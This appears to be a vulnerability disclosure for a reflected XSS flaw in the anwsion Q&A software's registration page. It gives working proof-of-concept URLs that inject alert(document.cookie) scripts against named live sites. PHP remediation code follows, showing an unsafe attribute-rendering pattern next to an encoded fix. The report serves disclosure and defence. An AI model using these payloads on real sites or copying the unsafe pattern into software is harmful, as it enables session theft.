### Brief description:

A reflected XSS flaw that affects all anwsion installations. Please fix it, for the sake of www.3hack.com's security.

### Details:

```
http://www.3hack.com/?/account/register/email-435420828%40qq.com%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%22%3C
```

```
http://wenda.anwsion.com/account/register/email-435420828%40qq.com%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%22%3C#.jpg
```

This is not the only affected parameter. For example:

```
http://wenda.anwsion.com/account/register/user_name-435420828%40qq.com%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%22%3C#.jpg
```

### Proof of vulnerability:

![1.jpg](https://images.seebug.org/upload/201211/30182001a235f4572e245fe7b3f45813c10edb02.jpg)

All parameters on the registration page are affected, in the form:

```
name-{XSS code}
```
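The fix for this class of bug is output encoding at the point where the `name-value` path parameter is written back into the registration form. The sketch below is an added example, not anwsion's own code: the function names and the parser are hypothetical, the request path is constructed with a harmless `<b>` marker, and it assumes the value is echoed into a `value="..."` attribute, as the `">` prefix of the test strings above suggests.

```php
<?php
// Added example: hypothetical helpers, not anwsion's own code.

// Split "/account/register/email-foo/user_name-bar" into ['email' => 'foo', ...].
// Constructed parser that mimics the "name-value" path-segment style in the report.
function parse_path_params(string $path): array
{
    $params = [];
    foreach (explode('/', trim($path, '/')) as $segment) {
        $pos = strpos($segment, '-');
        if ($pos === false || $pos === 0) {
            continue; // plain route parts such as "account" or "register"
        }
        $name = substr($segment, 0, $pos);
        // Allow-list the parameter name; the value itself stays untrusted.
        if (preg_match('/^[a-z_]+$/', $name)) {
            $params[$name] = rawurldecode(substr($segment, $pos + 1));
        }
    }
    return $params;
}

// Vulnerable pattern: the untrusted value is concatenated into an attribute,
// so a double quote in the value ends the attribute and the rest becomes markup.
function render_input_unsafe(string $name, string $value): string
{
    return '<input type="text" name="' . $name . '" value="' . $value . '">';
}

// Hardened pattern: encode for the HTML attribute context at output time.
// ENT_QUOTES covers both quote styles; ENT_SUBSTITUTE replaces invalid UTF-8.
function render_input_safe(string $name, string $value): string
{
    $enc = fn(string $s): string =>
        htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="text" name="' . $enc($name) . '" value="' . $enc($value) . '">';
}

// Constructed request path; both registration parameters go through the same code.
$path = '/account/register/email-a%40example.com%22%3E%3Cb%3E/user_name-bob';
foreach (parse_path_params($path) as $name => $value) {
    echo 'unsafe: ', render_input_unsafe($name, $value), PHP_EOL;
    echo 'safe:   ', render_input_safe($name, $value), PHP_EOL;
}
```

Because every registration parameter is affected, the encoding belongs in the shared template or output helper rather than in per-parameter input filters.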